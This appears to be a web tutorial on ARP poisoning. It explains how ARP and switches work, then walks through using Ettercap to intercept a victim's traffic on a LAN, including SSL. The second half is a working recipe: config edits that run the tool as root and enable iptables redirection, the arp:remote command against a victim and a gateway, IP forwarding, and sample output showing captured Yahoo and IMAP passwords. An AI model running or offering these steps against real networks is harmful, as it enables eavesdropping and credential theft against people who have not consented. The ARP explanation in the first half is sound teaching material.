Print
Parent Category: Security
Hits: 53375

 

In an Ethernet network computers communicate with each other via Ethernet (MAC (Media Access Control)) addresses. So, there is a mechanism needed for matching of IP addresses with the addresses in an ethernet network. The mechanism is called ARP (Address Resolution Protocol). What ARP does is exactly what most people do, when they have to find Mister X in a crowd of people - they shout loud enough, so that everyone can hear them and expect Mister X to answer, if he is there. When he answers, we will know who is he. 
When ARP wants to know whats the Ethernet address matching a given IP address it uses an Ethernet technic, called BROADCASTING, with which the datagram is addressed to all the workstations in the network. The broadcast-datagram sent by ARP contains a request for the IP address. Every computer, received that request compares the requested address with its own IP address and if they match, it sends an ARP reply back to the asking computer. After rreceiving the reply, the asking computer can get the Ethernet address of the computer it is looking for, from his reply. After the computer finds an Ethernet address, he stores it in its ARP cache (ARP table), so he won't need to look for it the next time he wants to send a datagram to the same address. However, it is not good this information to be stored forever (the Ethernet adapter of the other host may be replaced for some reasonm and the entry for the computer's IP in the ARP cache will become invalid). So the entries in the ARP cache expire after a period of time. 
What's the difference between switch and hub? 
The switches (hubs) don't only provide more connect points to the network - they're also retransmitters of the signal. However, the hub just retransmits the data received from one port to all the other ports so no need to poison, as you get the datagram anyway. Normally, the network adapter compares the destination Ethernet address of the packets, and compares it with it's own Ethernet address. If they match - the data is accepted. If they don't - it just drops the packets. You can put your network adapter in promiscuous mode (which is exactly what Ettercap does) and get all the packets. The switch does the things in a more 'elegant' way. It has a simple CAM (Content Addressable Memory) table, which is a simple mapping of Ethernet addresses and ports. When a datagram comes through a port, the switch remembers the source Ethernet address of the datagram and stores it in the cam table for the given port, so when a datagram arrives for this computer, it doesn't retransmit it to all ports, but only to this one, which is bound to the Ethernet address of the receiver in the CAM table. If no Port Security, the CAM table is dynamically updated (e.g. if you want to connect to another port, if you change your network adapter etc.). Thus, we can change the CAM table and map another Ethernet address to our port. This technique is called Port Stealing and is discussed in another topic. 
Now about the poisoning: 
Most operating systems will replace an entry in their ARP cache even if they haven't sent and ARP request before. That allows a MITM (Man-In-The-Middle) attack to be performed. For example, lets say we have 2 computers, with Ethernet addresses AA:AA:AA:AA:AA:AA for computer A, and BB:BB:BB:BB:BB:BB for computer B and IP addresses 10.10.0.1 for computer A and 10.10.0.2 for computer B. Now we want to perform MITM attack. We are computer C with Ethernet address CC:CC:CC:CC:CC:CC and IP address 10.10.0.3. So we send and ARP reply to computer A, saying that we have IP address 10.10.0.2. Computer A updates its ARP cache and since we have an Ethernet address CC:CC:CC:CC:CC:CC, the entry in his ARP cache for 10.10.0.2 is bound to our Ethernet address. Now when computer A wants to send a datagram to computer B, it checks first the ARP cache, to see if computer B's Ethernet address is already there. Since th packet is for 10.10.0.2 (computer B's IP address), computer A founds that the Ethernet address for computer B is CC:CC:CC:CC:CC:CC (out Ethernet address) and sends the datagram to us. Computer A is poisoned. We do the same to computer B - it has an ARP entry for 10.10.0.1 (computer A's IP address) bound to CC:CC:CC:CC:CC:CC (our Ethernet address), so when it sends datagrams to computer A, these datagrams come to us. For the communication between computer A and computer B to continue uninterrupted, we need to forward the packets to their original destination. So when we receive a packet for a computer A - we forward it to computer A, when we receive a packet for computer B - we forward it to computer B. In Linux, for this to works, you can use the simple kernel forwarding (echo 1 > /proc/sys/net/ipv4/ip_forward) or use a more complex one, that Ettercap and some other tools use, which even allows you to perform a MITM attack on a SSL connection. 
Some operating systems like Solaris do not accept ARP replies without first initiating an ARP request, so they are not vulnerable to this attack. In this case, an ICMP spoofed packet (ping) is used. The goal is, to get a valid entry in victim's ARP cache, because when they receive an ARP reply from you they will first check their cache to see if you're already there and if you're not - they simply wont add you at all. So you send each victim a ping with source your own Ethernet address and the other victim's IP address. In the case mentioned above, you ping computer A with source IP address 10.10.0.2 and Ethernet address CC:CC:CC:C:CC:CC and computer B with source IP address 10.10.0.1 and Ethernet address CC:CC:CC:CC:CC:CC. Once you gor yourself in their ARP cache, you can poison normally. 
Note: Switches with Port Security does not stop ARP poisoning, since we don't spoof the Ethernet addresses, but the IP ones.

 

 

 

Below you have a live example of sniffing a yahoo password over SSL connection. Aplication used it ettercap, wich is suite for man in the middle attacks on LAN. It features sniffing of live connections, content filtering on the fly and many other interesting tricks.
It supports active and passive dissection of many protocols (even ciphered ones) and includes many feature for network and host analysis.

 

First you need to configure ettecap for sniffing a ssl connection. Open etter.conf and edit the lines:
[privs]
ec_uid = 65534 # nobody is the default
ec_gid = 65534 # nobody is the default
to
[privs]
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
and the other part i changed was the command used.
from this

# the command used by the remote_browser plugin
remote_browser = "mozilla -remote openurl(http://%host%url)"
to this
the command used by the remote_browser plugin
remote_browser = "firefox -remote= openurl http://%host%url"
now save it. i could only get it working through ethernet but someone could work this out cause i cant. now when you scan for hosts, remember to check the host list a delete yourself off the list. there must be a better way then this but im still new to BT and i dont know how to do this yet. if you dont then you'l soon find out why lol. also goto your plugin tab and activate you remote_browser plugin.
now the rest is the same as if your sniffing passwords. Mitm tab and click arp poisoning then remote connection. then Start and start sniffing.
For those who dont know this, when your finished dont forget to stop your arp poisoning before you exit ettercap. i dont know if this maks a difference but you should also uncomment your iptables in etter.conf.
from this
# if you use iptables:
#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
to this
# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT %rport"
Next information that you need is the victim ip and the gateway ip. Let's assume that the victim ip is 10.0.0.2 and the gateway is 10.0.0.1:
ettercap -Tq -i eth0 -M arp:remote /10.0.0.2/ /10.0.0.1/
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

eth0 -> XX:XX:XX:XX:XX:XX 10.0.0.2 255.255.255.0

Privileges dropped to UID 0 GID 0...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |==================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 10.0.0.2 XX:XX:XX:XX:XX:XX

GROUP 2 : 10.0.0.1 XX:XX:XX:XX:XX:XX
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

HTTP : 217.12.8.76:443 -> USER: victim PASS: victimpassINFO: login.yahoo.com/config/pwtoken_get?src=ymsgr&ts=1235648757&login=victim&passwd=victimpass&chal=t+s^h%t%w&c%(q|t-3|e-w+u-u)%m-v%x%5&(8+(t/(n+a+t^b)%r/(i/c%(z+5%c%z^8-u))))
IMAP : xxx.xxx.xxx.xxx:143 -> USER: "victim" PASS: "victimpass"
If you get message like:
SEND L3 ERROR: 1500 byte packet (0800:06) destined to 209.85.137.125 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
then you must be shure that you've activated the forward between interfaces:
#echo "1" > /proc/sys/net/ipv4/ip_forward

Note:

We use Hosting and VPS Hosting, from: www.star-host.org

We like and trust them.

Good prices, high security.